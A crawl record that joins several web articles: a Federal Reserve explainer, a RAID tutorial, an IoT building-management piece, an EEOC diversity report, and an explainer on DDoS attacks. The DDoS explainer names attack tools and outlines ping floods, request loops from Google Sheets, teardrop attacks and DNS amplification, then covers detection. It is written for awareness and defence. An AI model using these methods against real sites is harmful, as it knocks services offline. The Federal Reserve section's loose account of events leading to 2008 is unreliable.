This stance, in which the Fed reduces interest rates, is called "accommodative". Currently, owing to the slowdown inflicted by the Covid-19 pandemic, the Fed maintains an accommodative stance and has committed to near-zero interest rates for the medium term, which has helped stabilize global equity markets and has eased the availability of credit to ailing corporates.
It took the same stance after the slowdown that followed the Y2K crisis, when it similarly held interest rates low until 2003, but this led to an unrestrained and essentially unsustainable flow of credit to individuals and corporates, driving up inflation. Alan Greenspan, then Chair of the Federal Reserve, therefore took steps to drain excess liquidity from the market by increasing the funds rate.
Credit had already been doled out on a rather loose set of checks and balances by banks and financial products without proper due diligence had been sold to institutional investors and banks. In turn, all of this led to the global financial crisis of 2008, where borrowers started defaulting on their mortgages due to rather high-interest payments and credit default swaps started exploding, risking the entire financial system.
Therefore, the key to sustainable development lies in balancing the growth cycles through necessary interventions in the credit market thereby providing a stable growth environment to the economic constituents. Hence, the current policy of the Fed is to maintain close to 2% inflation in the long term so steady growth can be achieved.
Investors have historically shown a preference for lower volatility in the growth cycles of economies to hold investments within nations – and hence, stable returns are more valued by investors globally rather than higher yet unsustainable and riskier ones. In order to provide guidance, the Fed also comes out with a target fund rate in order to provide a stable and transparent outlook to all market participants.
The guidance provided by Fed helps individuals and corporations to plan their financial decisions and provides a stable outlook on both interest rates based upon Fed’s estimate on inflation.
(Suggested blog: What is Credit Rating?)
Open Market Operations
Though the federal fund rate changes govern the prime lending rate in the market – this is not a frequent tool applied by the Fed.
In order to maintain the prime rate within the targeted range, another powerful tool in the Fed’s hand is open market operations, where Fed purchases government securities held indirectly by banks in the open market in order to hit a target fund rate.
In essence, this governs the supply of reserves in the banking system, thereby affecting interest rate changes. In case the Fed wants to bring down the effective prime rate, it will buy government securities through the open market operations, run through the New York Fed trading desk, thereby injecting money into the banks, which in turn shall be given out at a lower rate due to demand-supply dynamics in the market, in order to maximise treasury income for the banks.
Federal Funds Rate:
The federal funds rate refers to the interest rate that banks charge other banks for lending to them excess cash from their reserve balances on an overnight basis.
By law, banks must maintain a reserve equal to a certain percentage of their deposits in an account at a Federal Reserve bank. The amount of money a bank must keep in its Fed account is known as a reserve requirement and is based on a percentage of the bank's total deposits.
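A quick worked example makes the mechanics concrete; the deposit figure and the 10% ratio below are hypothetical (and US reserve requirement ratios were in fact cut to zero in March 2020):

    deposits = 100_000_000        # hypothetical bank deposits, in dollars
    reserve_ratio = 0.10          # hypothetical 10% reserve requirement
    required_reserve = deposits * reserve_ratio   # $10,000,000 held at the Fed
    lendable = deposits - required_reserve        # $90,000,000 available to lend
    print(required_reserve, lendable)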
In response to the Covid-19 crisis, the Federal Reserve has cut its goal for the Federal Funds rate by 1.5% since March last year. Currently, the fed funds rate is at the 0% to 0.25% range, as described by brookings.edu.
The forward guidance provided by the Federal Reserve reaffirms its accommodative stance and provides confidence to entities worldwide. The Federal Reserve’s affirmative forward guidance puts downward pressure on the long-term rates.
Quantitative easing is done by the Federal Reserve by purchasing massive amounts of securities and thereby infusing liquidity into the financial system. The Federal Reserve has made no policy changes regarding the $120 billion per month cash infusion programme currently in place in the latest FOMC meeting held last month.
Apart from the weapons discussed above, the Federal Reserve employs lending facilities to securities firms at low rates, expands the scope of its repo agreements, reduces the reserve requirements, provides special credit facilities to support loans to small businesses, etc. to revive the economy in a holistic manner.
Covid-19 presented one of the most daunting challenges the Fed has faced: lockdowns stalled economic activity while investor confidence tumbled as pundits forecast that the world economy would enter a long-term recession. In response, the Fed used all the weapons in its arsenal, from the funds rate and open market operations to liquidity facilities, swap lines and reserve requirements.
(Must read: Types of bonds)
In order to reinforce confidence in global markets, the Federal Reserve went so far as to provide central banks and other international monetary authorities with accounts at the Federal Reserve Bank of New York and extended repurchase facilities to them, in effect providing unprecedented amounts of liquidity to global markets and backstopping the risk faced by investors who were pulling money out of the markets.
All in all, the Federal Reserve’s major goal is to provide financial stability to the economy and it accomplishes the same through an array of weapons at its disposal. The intended purpose to establish the Federal Reserve System was to augur a stable economic development path for the US, but with an unprecedented scale of globalization through the past few decades, it has become the bearer of one of the most important guiding lights to the international credit markets.
As Covid has helped us understand, the Federal Reserve plays an important role in stabilizing the world economy to a significant level. | <urn:uuid:fad17462-42d6-4035-aa74-71efbcaf18c8> | CC-MAIN-2022-40 | https://www.analyticssteps.com/blogs/federal-reserve-its-working-mechanism | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00741.warc.gz | en | 0.949795 | 2,046 | 3.984375 | 4 |
How to DDoS Like an Ethical Hacker
Of course, this isn’t something you should try at home.
You’ve just arrived home after a long work day, so long in fact that night has already set in. You wander a bit through the darkness, turn on the lights, grab two slices of bread, and put them into that old, creaking toaster. It’s nothing fancy, just a quick and dirty snack until you undress, unwind and cook a proper dish.
The moment you push down on the button to toast the bread, you hear a loud pop, and all of the lights suddenly go out.
“Damn, the fuse blew up.”
Because the toaster was faulty, it flooded the electrical installation with excessive current it wasn’t designed to handle. This blew up the fuse, and shut down the installation.
A nearly identical process takes place in DDoS attacks. Replace “electrical current” with “information”, and “installation” with the term “information processor”, and you’ve already understood the basic principle.
What does DDoS stand for?
A DDoS attack is short for “Distributed Denial of Service”, and is the bigger brother of simpler denial-of-service attacks.
The point of these exercises is to take down a website or service, typically by flooding it with more information than the victim website can process.
DoS attacks typically send information from only one source (think PCs, or other internet-connected devices), but a DDoS attack uses thousands, or hundreds of thousands, of sources to flood its target. This makes it a few orders of magnitude more powerful than its smaller sibling.
Measuring the strength of a DDoS
A 1 GB/s denial-of-service attack is strong enough to take down most of the websites out there, since their data hosting simply doesn’t offer enough bandwidth to keep the site online.
One of the biggest ever recorded was the Mirai botnet attack in autumn 2016, coming in at over 1 terabit per second. It overwhelmed the DNS provider Dyn, and the effect then cascaded, temporarily taking down major websites such as Reddit and Twitter.
Nowadays, even beginner hackers who can't code to save their life (called script kiddies) have access to big and powerful botnets-for-hire that can flood a target with 100 GB/s. This type of threat isn't going away. Quite the contrary, it will only become more powerful and more widely accessible than before.
Why would anybody do this?
Compared to other kinds of cyber attacks, DDoS attacks are messy, overly destructive, and very difficult to pull off. Because of this, they don’t make much sense from a financial perspective.
So cybercriminals might use them as a blunt weapon against some of their competitors. For instance, they might want to bring down a site hosting a cybersecurity tool, or bring down a small online shop operating in the same niche.
In other cases, malicious hackers use them as a form of extortion, where the victim has to pay a fee in order for the denial of service to stop.
Also, a DDoS attack can act as a smokescreen, hiding the real endgame, such as infecting the target with malware or extracting sensitive data.
And in what constitutes a frequent scenario, the attacker might not even have a motive. Instead, he just does it for the “giggles”, seeking to test his abilities or just to cause mayhem.
How to DDoS someone, cybercriminal style
There’s more than one way of carrying out a denial-of-service attack. Some methods are easier to execute than others, but not as powerful. Other times, the attacker might want to go the extra mile, to really be sure the victim gets the message, so he can hire a dedicated botnet to carry out the attack..
A botnet is a collection of computers or other Internet-connected devices that have been infected with malware, and now respond to the orders and commands of a central computer, called the Command and Control center.
The big botnets have a web of millions of devices, and most of the owners have no clue their devices are compromised.
Usually, botnets are used for a wide variety of illegal activities, such as pushing out spam emails, phishing or cryptocurrency mining.
Some, however, are available to rent for the highest bidder, who can use them in whatever way seems fit. Oftentimes, this means a DDoS attack.
DDoS programs and tools
Small scale hackers who don’t have access to botnets, have to rely on their own computers. This means using specialized tools, that can direct Internet traffic to a certain target.
Of course, the amount of traffic an individual computer can send is small, but crowdsource a few hundreds or thousands of users, and things suddenly grow in scope.
This particular tactic has been successfully employed by Anonymous. In short, they send a call to their followers, asking them to download a particular tool, and be active on messaging boards, such as IRC, at a particular time. They then simultaneously attack the target website or service, bringing it down.
Here’s a sample list of tools that malicious hackers use to carry out denial of service attacks:
- Low Orbit Ion Cannon, shortened to LOIC.
- HULK (HTTP Unbearable Load King).
- DDOSIM – Layer 7 DDoS Simulator
- Tor’s Hammer.
How to DDoS an IP using cmd
One of the most basic and rudimentary denial-of-service methods is called the "ping of death", and uses the Command Prompt to flood an Internet Protocol address with data packets (strictly speaking, this is a ping flood; the original "ping of death" exploited malformed, oversized ping packets).
Because of its small scale and basic nature, ping of death attacks usually work best against smaller targets. For instance, the attacker can target:
a) A single computer. However, in order for this to be successful, the malicious hacker must first find out the IP address of the device.
b) A wireless router. Flooding the router with data packets will prevent it from sending out Internet traffic to all other devices connected to it. In effect, this cuts the Internet access of any device that used the router.
In order to launch a ping denial-of-service attack, the malicious hacker first needs to find out the IP of the victim’s computer or device. This is a relatively straightforward task, however.
A ping of death is small in scale, and fairly basic, so it’s mostly efficient against particular devices. However, if multiple computers come together, it’s possible for a handful of these to bring down a smallish website without the proper infrastructure to deal with this threat.
Using Google Spreadsheet to send countless requests
An attacker can use Google Spreadsheets to continuously ask the victim’s website to provide an image or PDF stored in the cache. Using a script, he will create a neverending loop, where the Google Spreadsheet constantly asks the website to fetch the image.
This huge amount of requests overwhelms the site and blocks it from sending outward traffic to visitors.
Unlike other denial-of-service tactics, this one doesn’t send large information packages to flood the website, but instead, it makes data requests, which are much, much smaller.
In other words, the attacker doesn’t need to rely on sizeable botnet or thousands of other users to achieve a similar effect.
In most cases, the information transmitted between a client device and the server is too big to be sent in one piece. Because of this, the data is broken into smaller packets, and then reassembled again once it reaches the server.
The server knows the order of reassembly through a parameter called “offset”. Think of it as instructions to building a LEGO toy.
What a teardrop attack does, is to send data packets at the server that make no sense, and have overlapping or dysfunctional offset parameters. The server tries, and fails, to order the data according to the malicious offset parameters. This quickly consumes available resources until it grinds to a halt, taking down the website with it.
Amplifying a DDoS attack
To maximize every data byte, malicious hackers will sometimes amplify the flood by using a DNS reflection attack.
This is a multiple-step process:
- The attacker will assume the identity of the victim by forging its IP address.
- Using the forged identity, he will then send out countless DNS queries to an open DNS resolver.
- The DNS resolver processes each query, and then sends the information back to the victim device whose identity was spoofed. However, the information packets the DNS resolver sends out are much bigger than the queries it receives.
What happens during amplification is that every 1 byte of information becomes 30 or 40 bytes, sometimes even more. Amplify this further using a botnet with a few thousand computers, and you can end up sending 100 gigabytes of traffic towards a site.
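The arithmetic behind that claim is simple multiplication; the botnet size and per-bot query rate below are invented purely to illustrate the effect:

    bots = 3_000                    # hypothetical botnet size
    query_rate_bps = 1_000_000      # ~1 Mbit/s of spoofed DNS queries per bot (assumed)
    amplification = 40              # responses ~40x larger than the queries, per the text above
    victim_traffic_bps = bots * query_rate_bps * amplification
    print(victim_traffic_bps / 1e9, "Gbit/s arriving at the victim")   # 120.0 Gbit/s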
The types of DDoS attacks
Denial-of-Service attacks fall in two broad categories, depending on their main attack vector:
- Application Layer.
- Network Layer.
Network Layer attacks
A network layer attack works by flooding the infrastructure used to host a website with vast amounts of data.
Many providers nowadays claim they offer “unmetered” bandwidth, meaning you should theoretically never have to worry about excessive amounts of traffic taking down your site. However, this “unmetered” bandwidth comes with strings attached.
To put things into perspective, a website with some 15,000 monthly pageviews and hundreds of pages requires around 50 gigabytes of monthly bandwidth to operate optimally. Keep in mind that this traffic is widely dispersed over the course of an entire month. A site like this has no chance to stay online if a DDoS attack rams it with 30 or 40 gigs of traffic in a one-hour period.
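Put into rough numbers, using the figures above and assuming the attack traffic arrives within a single hour (the 35 GB value simply splits the "30 or 40 gigs"):

    monthly_bandwidth_gb = 50                 # normal month of traffic, per the example above
    seconds_per_month = 30 * 24 * 3600
    normal_rate_mbps = monthly_bandwidth_gb * 8_000 / seconds_per_month   # ~0.15 Mbit/s average
    attack_gb, attack_seconds = 35, 3600                                  # ~35 GB in one hour (assumed)
    attack_rate_mbps = attack_gb * 8_000 / attack_seconds                 # ~78 Mbit/s sustained
    print(round(normal_rate_mbps, 2), round(attack_rate_mbps, 1))

The attack rate is roughly 500 times the site's average rate, which is why "unmetered" hosting plans still buckle.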
As a self-defense measure, the hosting provider itself will simply cut off hosting you while the traffic normalizes. Although this might seem cold, this prevents spill-over effects that might affect other clients of the hosting provider.
Network layer attacks themselves come in multiple shapes and sizes. Here are a few of the more frequent ones:
- SYN Attacks. SYN is a shorthand for “synchronize”, and is a message that a client (such as a PC) sends to the server for the two to be in sync.
- DNS reflecting.
- UDP amplification attacks.
An upside to this kind of attack, if you can call it that, is that the huge amounts of traffic involved make it easier for victims to figure out what kind of denial of service they’re facing.
Application layer attack
Application layer attacks are much more surgical in nature compared to network ones. These work by targeting certain programs or software that a website uses in its day-to-day functioning.
For instance, an application layer attack will target a site’s WordPress installation, PHP scripts or database communication.
This type of software can’t handle anywhere near the load of wider network infrastructure, so even a comparatively small DDoS of a few megabytes per second can take it down.
The typical application layer DDoS is the HTTP flood. This works by abusing one of two commands, POST or GET. The GET command is a simple one that recovers static content, like the web page itself or an image on it.
The POST command is more resource-intensive, since it triggers complex background processes with a greater impact on server performance.
An HTTP flood will generate a huge amount of internal server requests that the application cannot handle, so it then flops and takes down the entire site with it.
How do you detect a DDoS attack?
Analyze the traffic, is it a usage spike or an attack?
Traffic spikes are a frequent occurrence, and can actually be big enough to take down poorly prepared websites. A site designed to cope with an average of 30-40 concurrent users will come under strain if a spike brings up the number to 600-700 users at the same time.
The first sign of a DDoS attack is a strong slowdown in server performance or an outright crash. 503 “Service Unavailable” errors should start around this time. Even if the server doesn’t crash and clings on to dear life, critical processes that used to take seconds to complete now take minutes.
Wireshark is a great tool to help you figure out if what you’re going through is a DDoS. Among its many features, it monitors what IP addresses connect to your PC or server, and also how many packets it sends.
Of course, if the attacker uses a VPN or a botnet, you’ll see a whole bunch of IPs, instead of a single one. Here’s a more in-depth rundown on how to use Wireshark to figure out if you’re on the wrong end of a denial-of-service.
Microsoft Windows also comes with a native tool called Netstat, which shows you what devices are connecting to your server, and other similar statistics.
To open the tool, type cmd in the Start menu search bar, and then type in netstat -an. This will show your own internal IP in the left-hand column, while the right-hand column holds all of the external IPs connected to your device.
The screenshot above is for a normal connection. In it, you can see a few other IPs that communicate normally with the device.
Now, here’s how a DDoS attack would look like:
On the right-hand side, you can see that a single external IP repeatedly tries to connect to your own device. While not always indicative of a DDoS, this is a sign that something fishy is going on, and it warrants further investigation.
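If you would rather not eyeball the netstat output, a short script can tally established connections per remote address. This sketch relies on the psutil library, which is an assumption (it is not mentioned above), and any alert threshold should be tuned to your own traffic baseline:

    from collections import Counter
    import psutil  # pip install psutil (assumed available)

    def connections_per_remote_ip():
        counts = Counter()
        for conn in psutil.net_connections(kind="tcp"):
            # Count only fully established sessions that have a remote endpoint
            if conn.raddr and conn.status == psutil.CONN_ESTABLISHED:
                counts[conn.raddr.ip] += 1
        return counts

    for ip, count in connections_per_remote_ip().most_common(10):
        flag = "  <-- unusually chatty, investigate" if count > 100 else ""
        print(f"{ip:>15}  {count}{flag}")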
DDoS attacks will only get more frequent as time passes and script kiddies get access to ever more sophisticated and cheap attack methods. Fortunately, denial-of-service attacks are short-lived affairs, and tend to have a short-term impact. Of course, this isn’t always the case, so it’s best to be prepared for the worst-case scenario.
| <urn:uuid:002aa3dd-c5a4-424d-b93d-28d0e407e901> | CC-MAIN-2022-40 | https://heimdalsecurity.com/blog/how-to-ddos/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00741.warc.gz | en | 0.925868 | 3,084 | 2.859375 | 3 |
In this SAN and NAS Storage tutorial, I explain what RAID is, how it works, and the differences between the different RAID types. Depending on what you’re reading, RAID stands for either “Redundant Array of Inexpensive Disks,” or “Redundant Array of Independent Disks.”
The original name was inexpensive disks, but then the drive manufacturers thought that didn’t sound very good from a marketing point of view, so the more common modern term now is “Redundant Array of Independent Disks.” Scroll down for the video and also text tutorial.
Want the complete course? Click here to get the Introduction to SAN and NAS Storage course for free
RAID Storage Overview – Video Tutorial
With RAID, multiple physical disks are combined into a single logical unit. The reason we do that is to provide redundancy or improve performance, or both, when we compare that set of disks to a single disk. There are different levels of RAID, which are assigned different numbers, such as RAID 1 and RAID 5. They provide different levels of redundancy or performance.
RAID can be managed in software by the operating system or in hardware by a controller.
In the video I cover the popular levels of RAID. The other types are not commonly used in today’s production networks.
The first type to cover is RAID 0, which is also known as a striped set. Data is split evenly across all the disks in the set. That provides better performance, but no redundancy. If any disk in the set fails, then all the data is lost and we would have to recover that from an external backup.
It's actually less reliable than a single disk, because with five disks, for example, the chance that at least one of them fails at any given point in time is higher than with just a single disk.
RAID 0 gives us better performance because we can write our data to multiple disks at the same time. It’s quicker to write the same amount of data concurrently to multiple disks than it is to write it to one disk. There is some overhead so it’s not as simple as if you’ve got 5 disks you will get 5 times the speed, but the more disks (also called spindles) you have, the better performance you’re going to get.
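To make the striping idea concrete, here is a tiny illustrative sketch (nothing like a real controller, which works at the block-device level) that splits data into fixed-size chunks and deals them out round-robin across the disks in the set.

CHUNK = 4  # stripe unit size in bytes, kept unrealistically small for illustration

def stripe(data, disks):
    # Deal fixed-size chunks out to each disk in round-robin order (the RAID 0 idea)
    stripes = [bytearray() for _ in range(disks)]
    for i in range(0, len(data), CHUNK):
        stripes[(i // CHUNK) % disks] += data[i:i + CHUNK]
    return [bytes(s) for s in stripes]

print(stripe(b"ABCDEFGHIJKLMNOP", 2))  # disk 0 gets ABCD+IJKL, disk 1 gets EFGH+MNOP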
The next RAID type we’re going to cover is RAID 1, which is also known as a mirrored set. RAID 1 is like a reverse of RAID 0. A copy of the data is written to both disks in the set which provides redundancy. If one disk fails, we still have a working copy of the data on the other disk. Write performance is not improved, as we write a copy of the same data to both disks at the same time. Read performance, however, is improved as reads can be serviced by either disk.
The next RAID type is RAID 4. This uses block level striping with a dedicated parity disk. The parity disk is used for redundancy – data can be recreated from parity if one of the disks in the set fails. We can survive a single disk in the set failing.
Read performance is improved as multiple disks concurrently service reads. Write performance is not improved, as all parity data is written to the same single disk.
When you use RAID 4, you don’t get the full capacity of all the disks in the set. If you’ve got 3 drives, you’ll get the capacity of two disks as your usable capacity, because one of the drives is reserved for the parity information.
If I do lose a drive in my set I can still carry on servicing the data to my clients. There will be a performance hit when this is happening, because the data is going to have to be recalculated from parity for that failed drive.
The failed drive should be replaced as soon as possible. It will take some time to calculate from parity the data that was on there and write it back onto the disk. Once that has been completed, then it will be back up at the initial level of performance.
Our next type of RAID to discuss is RAID 5, which uses block level striping with distributed parity. RAID 4 was block level striping with a dedicated parity drive. RAID 5 distributes the parity information across all the drives in the set. Similarly to RAID 4, data can be recreated from parity if one of the disks in the set fails. Read performance is improved, as multiple disks concurrently serve reads, and write performance is also improved as parity data is spread throughout the set. That’s one advantage of RAID 5 over RAID 4. Other than that, they’re very similar.
The next type is RAID 6, which is similar to RAID 5. It uses block level striping with two parity blocks distributed throughout the set. RAID 5 has one parity block, RAID 6 has two. Because it has two, data can be recreated from parity if up to two of the disks in the set fail. We would need three drives to fail before we would have to recover from an external backup. With RAID 6, like RAID 5, read and write performance is improved.
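The parity used by RAID 4, 5 and 6 is based on XOR. The toy example below (a simplification of what a real controller does, and ignoring how RAID 6 computes its second, independent parity) builds a parity block from three data blocks and then rebuilds a "failed" block from the survivors.

def xor_blocks(blocks):
    # XOR the corresponding bytes of every block together
    out = bytearray(len(blocks[0]))
    for block in blocks:
        for i, b in enumerate(block):
            out[i] ^= b
    return bytes(out)

data = [b"AAAA", b"BBBB", b"CCCC"]   # data blocks sitting on three disks
parity = xor_blocks(data)            # parity block stored on a fourth disk

# The disk holding data[1] fails: rebuild its contents from the surviving blocks plus parity
rebuilt = xor_blocks([data[0], data[2], parity])
print(rebuilt == data[1])            # True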
HYBRID RAID – RAID 10, 0+1, and 50
We can also set up hybrid RAID, where RAID levels are nested into a hybrid set.
In RAID 10, or 1 + 0, multiple RAID 1 mirrored sets are nested into a RAID 0 stripe set.
In RAID 0 + 1 we do it the other way around, and multiple RAID 0 sets are nested into a RAID 1 mirror.
In RAID 50, or 5 + 0, multiple RAID 5 striped sets with parity are nested into a RAID 0 striped set.
IMPORTANT – DISK TYPE, CAPACITY AND SPEED
A word of warning. If you use disks of different capacities, the usable size is limited to the size of the smallest disk. Say we had a RAID group which already had five 500 gigabyte drives in it. Then we want to add some additional storage space, so we add a 1 terabyte drive. That 1 terabyte drive will be sized down to 500 gigabytes, the same size as the rest of the disks, so 500 gigabytes would be wasted. Obviously you don't want to do that. Make sure that all the disks in your RAID group are the same size.
There is a similar issue with speed. Basically, all the disks in your RAID set should be the same type (SSD/SAS/SATA), size and speed.
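As a rough illustration of that sizing rule, the helper below estimates usable capacity for a few common levels, assuming every member is treated as being the size of the smallest disk in the set; real arrays have additional metadata overhead that this ignores.

def usable_capacity_gb(disk_sizes_gb, level):
    n, smallest = len(disk_sizes_gb), min(disk_sizes_gb)
    disks_lost = {"RAID0": 0, "RAID1": n - 1, "RAID4": 1, "RAID5": 1, "RAID6": 2}[level]
    return (n - disks_lost) * smallest

# Five drives: four 500 GB and one 1 TB; the 1 TB drive is effectively sized down to 500 GB
print(usable_capacity_gb([500, 500, 500, 500, 1000], "RAID5"))  # 2000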
Free ‘Introduction to SAN and NAS Storage’ training course
Get my Introduction to SAN and NAS Storage video training for free here: | <urn:uuid:201ac370-1318-4b40-b4a4-b8a5ab19ed84> | CC-MAIN-2022-40 | https://www.flackbox.com/raid-storage | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00741.warc.gz | en | 0.946359 | 1,426 | 3.28125 | 3 |
The complexity of new state-of-the-art buildings is skyrocketing: aquariums, wedding chapels, rollercoasters, and even artificial canals are becoming the norm for office centres and shopping malls.
This is way too much to be efficiently managed by people alone, says Sergiy Seletskyi, IoT practice leader and senior solution architect at Intellias. And far too often, businesses have no idea how many resources their buildings waste and, more importantly, what it actually costs them.
Fortunately, technologies are getting more advanced, allowing for monitoring, automating, and optimising building operations. On the surface, it may seem that only digital-native businesses can leverage technological advancements. But that couldn’t be further from the truth.
Every single activity within a building can now generate data. Powered by IoT devices, a building management system (BMS) can collect and analyse data to offer granular visibility into what’s happening inside a building.
What is a BMS?
A building management system controls technical and electrical installations in a building by maintaining predefined parameters according to changing conditions.
Fifty years ago, the functionality of early BMSs was limited to simply switching on or off the right equipment at the right time of the day or year. But even these basic commands eased the management of essential facility assets such as lighting, pumps, elevators, and HVAC systems.
Over the years, a staggering range of new systems have appeared for everything from fire and smoke detection to video surveillance and security, switchable glass, exterior shading, water reclamation, and renewable energy.
Every new subsystem further burdens and increases the complexity of the entire facility management infrastructure. To address the challenge of maintaining and optimising building operations, BMSs evolved into complex IT infrastructure with layers of communication protocols, networks, and controls that integrate all subsystems into one ecosystem.
Today, an IoT-powered BMS offers significant opportunities for reducing energy consumption through HVAC monitoring, heat map analysis, and predictive maintenance. With a modern BMS, facility managers get a holistic view of a building’s operations, helping them make informed, business-critical decisions.
In the future, BMSs will get even more intelligent, enabling communication between buildings and bringing us toward a collaborative smart city ecosystem.
How does a BMS work?
A BMS architecture usually comprises four basic groups of devices: sensors, controllers, output devices, and a user interface.
At first, you configure the system via a control panel with a user interface. For example, you might set a daily schedule for temperature changes. Sensors collect whatever data you need about the building, whether it’s environmental conditions or energy consumption of systems and equipment.
Based on your settings and the information gathered by sensors, controllers decide on system adjustments, for instance regulating the amount of outside air intake according to the CO2 level in the room. Then, output devices (relays and actuators) execute commands received from the controllers. At any time, you can use the control panel to monitor reported data, assess the BMS performance, and change settings if desired.
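As a highly simplified illustration of that sense-decide-act loop, the sketch below adjusts an outside-air damper from a CO2 reading. Real controllers talk over standardized protocols such as BACnet and typically use proper PID control; the setpoint, gain and limits here are invented for the example.

CO2_SETPOINT_PPM = 800              # configured through the BMS user interface
DAMPER_MIN, DAMPER_MAX = 10, 100    # allowed damper opening, in percent

def next_damper_position(co2_ppm, current_pct):
    # Simple proportional rule: open the damper further the more CO2 exceeds the setpoint
    error = co2_ppm - CO2_SETPOINT_PPM
    target = current_pct + 0.05 * error
    return max(DAMPER_MIN, min(DAMPER_MAX, target))

# A sensor reports 1100 ppm; the controller commands the actuator to open from 30% to 45%
print(next_damper_position(co2_ppm=1100, current_pct=30))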
What are the benefits of a BMS?
Among the numerous benefits of implementing a BMS, energy savings is the most significant. Since cutting down on energy consumption directly means reduced energy spending, saving power improves a business’s profitability. Some estimates suggest that a BMS with strong data analytics can help reduce energy consumption by 30%.
Let's look at a common use case: a BMS combines data on HVAC operations and the weather forecast to help you develop a strategy for optimising operating costs on a hot day. Knowing in advance the periods of high demand when energy is more expensive, you can cool the building earlier in the day to avoid high charges. Another example is integrating a schedule of meetings or events to automatically adjust lighting, air conditioning, or heating where they will occur.
A BMS with IoT sensors embedded in equipment can provide real-time data about power use, temperature, vibration, and other measurements. An AI-powered analytics platform can learn patterns in hardware operations to identify deviant performance and alert about imminent malfunctions. Thus, it can help you save on emergency repairs.
Predictive maintenance is particularly useful at industrial plants to avoid breakdowns of costly equipment, since even a small operational interruption may cause enormous financial losses. Restaurants and grocery stores can also use IoT sensors to monitor refrigeration units to ensure their produce is always fresh.
A BMS can significantly strengthen a building’s security and save tangible assets, intellectual property, and above all, human life. Based on data from gas and smoke detectors, a BMS system can instantly open up emergency routes and give occupants directions to exits, saving precious time during an evacuation.
Closed-circuit television, motion sensors, and glass break detectors provide superior real-time intrusion control. For example, say a camera sees two people entering the building together at off-hours. The system checks the entrance log to find out how many people carded in at the specified door at the specified time. If two people carded in, the system returns to monitoring; otherwise, it alerts security about possible unauthorised access.
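In pseudo-logic, that check is just a comparison of two event streams. The snippet below is an illustrative sketch with invented event fields and door names, not a real access-control API.

def check_tailgating(camera_events, badge_events, door, time_window):
    # Compare how many people the camera saw enter with how many badged in at the same door and time
    seen = sum(e["count"] for e in camera_events if e["door"] == door and e["time"] in time_window)
    badged = sum(1 for e in badge_events if e["door"] == door and e["time"] in time_window)
    if seen > badged:
        return f"ALERT: {seen - badged} person(s) entered {door} without carding in"
    return "OK: entries match badge-ins"

print(check_tailgating(
    camera_events=[{"door": "north", "time": 2330, "count": 2}],
    badge_events=[{"door": "north", "time": 2330}],
    door="north",
    time_window=range(2325, 2336)))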
To create a dynamic and comfortable environment for occupants, a BMS collects information from connected sensors, beacons, Wi-Fi network, and PC activity. Using this information, you can provide your employees, customers, or guests with a unique presence experience.
Consider a simple use case: access control cards are programmed with cardholders' credentials, including personalised climate preferences. Integrated into the BMS, these settings are then applied based on a person's location within a building.
How does this technology suit your business?
By adopting an IoT-based BMS for new and retrofitted facilities, you can optimise operations within your properties, save on energy consumption, ensure strong security, and review the way you use space and assets.
You might say that a BMS works with new buildings that were designed to be smart. But how about older buildings? Older buildings can be retrofitted and automated in smaller but still smart ways, becoming important pieces of the sustainability puzzle.
Technological transformation is not for digital businesses only. It’s for everyone willing to embrace and benefit from advanced technology.
The author is Sergiy Seletskyi, IoT practice leader and senior solution architect at Intellias.
About the author
Sergiy helps companies harness the right IoT technology stack to scale business and make it future-proof. Strategic thinker with extensive knowledge of the IT Industry in a wide variety of innovative solutions for different business domains. | <urn:uuid:56a3cef4-01c7-4ed8-ade1-9674d67e3bc7> | CC-MAIN-2022-40 | https://www.iot-now.com/2021/04/26/109550-building-management-system-your-ticket-to-a-smart-city/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00741.warc.gz | en | 0.919127 | 1,394 | 2.859375 | 3 |
The high-tech industry famously faces a shortage of qualified labor. However, according to a “Diversity in High Tech” report from the U.S. Equal Employment Opportunity Commission (EEOC), that shortage would be far less dramatic were U.S. tech firms to hire all qualified candidates, rather than mostly just white men.
While there is some truth to the so-called “pipeline” problem, said the report, “there are additional factors at play.”
There is “anxiety” over the ability of the U.S. educational system to supply a workforce that can adequately support the country’s rapidly expanding STEM (science, technology, engineering and math) industries, explained the report. However, the study concluded: “Stereotyping and bias, often implicit and unconscious, have led to underutilization of the available workforce. The result is an overwhelming dominance of white men and scant participation of African Americans and other racial minorities. …. It has been shown, for example, that men are twice as likely as women to be hired for a job in mathematics when the only difference between candidates is gender.”
The report went on to note, citing The Urban Institute, that the U.S. educational system actually produces more qualified science and engineering graduates than there are jobs available. The problem is that “close to 50 percent of STEM graduates in the U.S. are not hired in STEM-related fields.”
The tech industry also faces an “exiting” problem, reports the EEOC. Women, feeling unsupported or without a path to growth, wind up leaving STEM professions.
"While 80 percent of U.S. women working in STEM fields say they love their work, 32 percent also say they feel stalled and are likely to quit within a year," stated the report. "Research by The Center for Work-Life Policy shows that 41 percent of qualified scientists, engineers and technologists are women at the lower rungs of corporate ladders but more than half quit their jobs."
More than anything, it’s bias that brings women to leave. They face inhospitable work cultures, isolation, conflicting work styles (men like to “firefight,” while women tend to plan, it explained), schedules that conflict with “women’s heavy household management workload” and a lack of advancement.
Further, these experiences were heightened for non-White women.
In a survey of 557 female scientists, two-thirds reported having to prove themselves over and over again, and having their successes discounted or their expertise questioned—while three-fourths of Black women reported the same.
Fifty-three percent of the scientists reported experiencing backlash for being decisive, outspoken or speaking their minds.
Thirty-four percent reported feeling pressured to play traditionally feminine roles, a figure that rose to 41 percent among Asian women. And the women—particularly Black and Latina—reported being seen as “angry” when they didn’t conform to a female stereotype.
Additionally, there’s a racial and ethnic pay gap in STEM fields.
“Asian-Americans reported the highest average earnings in STEM occupations,” said the report, “while non-Hispanic whites also had above-average earnings; black and Hispanic professionals earned below-average wages in 2012.”
Adding greater insult to the injury of inequality is the fact that the high-tech sector is one of the best sectors to be in.
“These jobs tend to provide higher pay and better benefits, and they have been more resilient to economic downturns than other private-sector industries over the past decade,” said the report, making them “important to the national economic and employment outlook.”
